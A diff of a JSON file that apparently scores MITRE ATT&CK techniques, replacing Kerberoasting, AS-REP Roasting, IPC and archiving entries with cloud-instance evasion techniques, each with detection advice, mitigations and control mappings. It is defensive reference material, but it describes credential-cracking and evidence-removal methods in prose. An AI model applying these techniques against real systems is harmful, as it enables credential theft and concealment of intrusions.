-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1558.003",
-                "name": "Steal or Forge Kerberos Tickets: Kerberoasting",
-                "url": "https://attack.mitre.org/techniques/T1558/003",
-                "description": "Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) \n\nService principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)\n\nAdversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)\n\nThis same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
-                "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)",
+                "tid": "T1578.002",
+                "name": "Modify Cloud Compute Infrastructure: Create Cloud Instance",
+                "url": "https://attack.mitre.org/techniques/T1578/002",
+                "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
+                "detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)",
                 "mitigations": [
                     {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1558.004",
-                "name": "Steal or Forge Kerberos Tickets: AS-REP Roasting",
-                "url": "https://attack.mitre.org/techniques/T1558/004",
-                "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)",
-                "detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)",
+                "tid": "T1578.003",
+                "name": "Modify Cloud Compute Infrastructure: Delete Cloud Instance",
+                "url": "https://attack.mitre.org/techniques/T1578/003",
+                "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
+                "detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)",
                 "mitigations": [
                     {
                         "mid": "M1047",
@@ -15599,2868 +38141,2956 @@
                         "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
+            },
+            {
+                "tid": "T1578.004",
+                "name": "Modify Cloud Compute Infrastructure: Revert Cloud Instance",
+                "url": "https://attack.mitre.org/techniques/T1578/004",
+                "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)",
+                "detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.",
+                "mitigations": []
             }
         ],
         "mitigations": [
             {
-                "mid": "M1015",
-                "name": "Active Directory Configuration",
-                "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1015"
-            },
-            {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
-            },
-            {
-                "mid": "M1027",
-                "name": "Password Policies",
-                "description": "Set and enforce secure password policies for accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1027"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.55491824,
-        "adjusted_score": 0.55491824,
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "4.1",
             "4.7",
-            "5.2",
             "5.3",
             "5.4",
-            "5.5",
             "6.1",
             "6.2",
             "6.8",
             "18.3",
-            "18.5",
-            "3.10"
+            "18.5"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-18",
-            "AC-19",
             "AC-2",
             "AC-3",
             "AC-5",
             "AC-6",
-            "CA-7",
-            "CM-2",
+            "CA-8",
             "CM-5",
-            "CM-6",
             "IA-2",
-            "IA-5",
-            "SC-4",
-            "SI-12",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "IA-4",
+            "IA-6",
+            "RA-5",
+            "SI-4"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.3,
-            "mitigation_score": 0.5636363636363636,
-            "detection_score": 0.01
+            "combined_score": 0.18095238095238098,
+            "mitigation_score": 0.34545454545454546
         },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.00491824
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
     },
     {
-        "tid": "T1559",
-        "name": "Inter-Process Communication",
-        "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \n\nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)",
-        "url": "https://attack.mitre.org/techniques/T1559",
+        "tid": "T1578.001",
+        "name": "Modify Cloud Compute Infrastructure: Create Snapshot",
+        "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)",
+        "url": "https://attack.mitre.org/techniques/T1578/001",
         "tactics": [
-            "Execution"
+            "Defense Evasion"
         ],
-        "detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.",
+        "detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\n\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\n\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\n\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)",
         "platforms": [
-            "Windows",
-            "macOS"
+            "IaaS"
         ],
         "data_sources": [
-            "Module: Module Load",
-            "Process: Process Creation",
-            "Script: Script Execution"
+            "Snapshot: Snapshot Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
+        "is_subtechnique": true,
+        "supertechnique": "T1578",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1559.001",
-                "name": "Inter-Process Communication: Component Object Model",
-                "url": "https://attack.mitre.org/techniques/T1559/001",
-                "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)",
-                "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ",
-                "mitigations": [
-                    {
-                        "mid": "M1048",
-                        "name": "Application Isolation and Sandboxing",
-                        "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                        "url": "https://attack.mitre.org/mitigations/M1048"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "tid": "T1559.002",
-                "name": "Inter-Process Communication: Dynamic Data Exchange",
-                "url": "https://attack.mitre.org/techniques/T1559/002",
-                "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)",
-                "detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\n\nOLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)",
-                "mitigations": [
-                    {
-                        "mid": "M1048",
-                        "name": "Application Isolation and Sandboxing",
-                        "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                        "url": "https://attack.mitre.org/mitigations/M1048"
-                    },
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1054",
-                        "name": "Software Configuration",
-                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                        "url": "https://attack.mitre.org/mitigations/M1054"
-                    }
-                ]
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-5",
+            "IA-2",
+            "IA-4",
+            "IA-6",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1578.002",
+        "name": "Modify Cloud Compute Infrastructure: Create Cloud Instance",
+        "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
+        "url": "https://attack.mitre.org/techniques/T1578/002",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)",
+        "platforms": [
+            "IaaS"
+        ],
+        "data_sources": [
+            "Instance: Instance Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1578",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
-            },
-            {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
-            },
-            {
-                "mid": "M1042",
-                "name": "Disable or Remove Feature or Program",
-                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                "url": "https://attack.mitre.org/mitigations/M1042"
-            },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "mid": "M1054",
-                "name": "Software Configuration",
-                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
-                "url": "https://attack.mitre.org/mitigations/M1054"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.5918016861904762,
-        "adjusted_score": 0.5918016861904762,
+        "cumulative_score": 0.28571428571428575,
+        "adjusted_score": 0.28571428571428575,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "2.5",
-            "2.6",
-            "4.1",
-            "4.8",
-            "13.7",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
             "18.3",
             "18.5"
         ],
         "nist_controls": [
             "AC-2",
             "AC-3",
-            "AC-4",
             "AC-5",
             "AC-6",
-            "CM-10",
-            "CM-2",
+            "CA-8",
             "CM-5",
-            "CM-6",
-            "CM-7",
-            "CM-8",
             "IA-2",
+            "IA-4",
+            "IA-6",
             "RA-5",
-            "SC-18",
-            "SC-3",
-            "SC-7",
-            "SI-2",
-            "SI-3",
             "SI-4"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": false,
-        "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2761904761904762,
-            "mitigation_score": 0.4727272727272727,
-            "detection_score": 0.06
-        },
-        "choke_point_score": 0.3,
-        "prevalence_score": 0.01561121
+        "cloud_coverage": true,
+        "hardware_coverage": false
     },
-    {
-        "tid": "T1560",
-        "name": "Archive Collected Data",
-        "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
-        "url": "https://attack.mitre.org/techniques/T1560",
+    {
+        "tid": "T1578.003",
+        "name": "Modify Cloud Compute Infrastructure: Delete Cloud Instance",
+        "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)",
+        "url": "https://attack.mitre.org/techniques/T1578/003",
         "tactics": [
-            "Collection"
+            "Defense Evasion"
         ],
-        "detection": "Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
+        "detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\n\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "IaaS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Creation",
-            "Process: Process Creation",
-            "Script: Script Execution"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1560.001",
-                "name": "Archive Collected Data: Archive via Utility",
-                "url": "https://attack.mitre.org/techniques/T1560/001",
-                "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\n\nSome 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.",
-                "detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
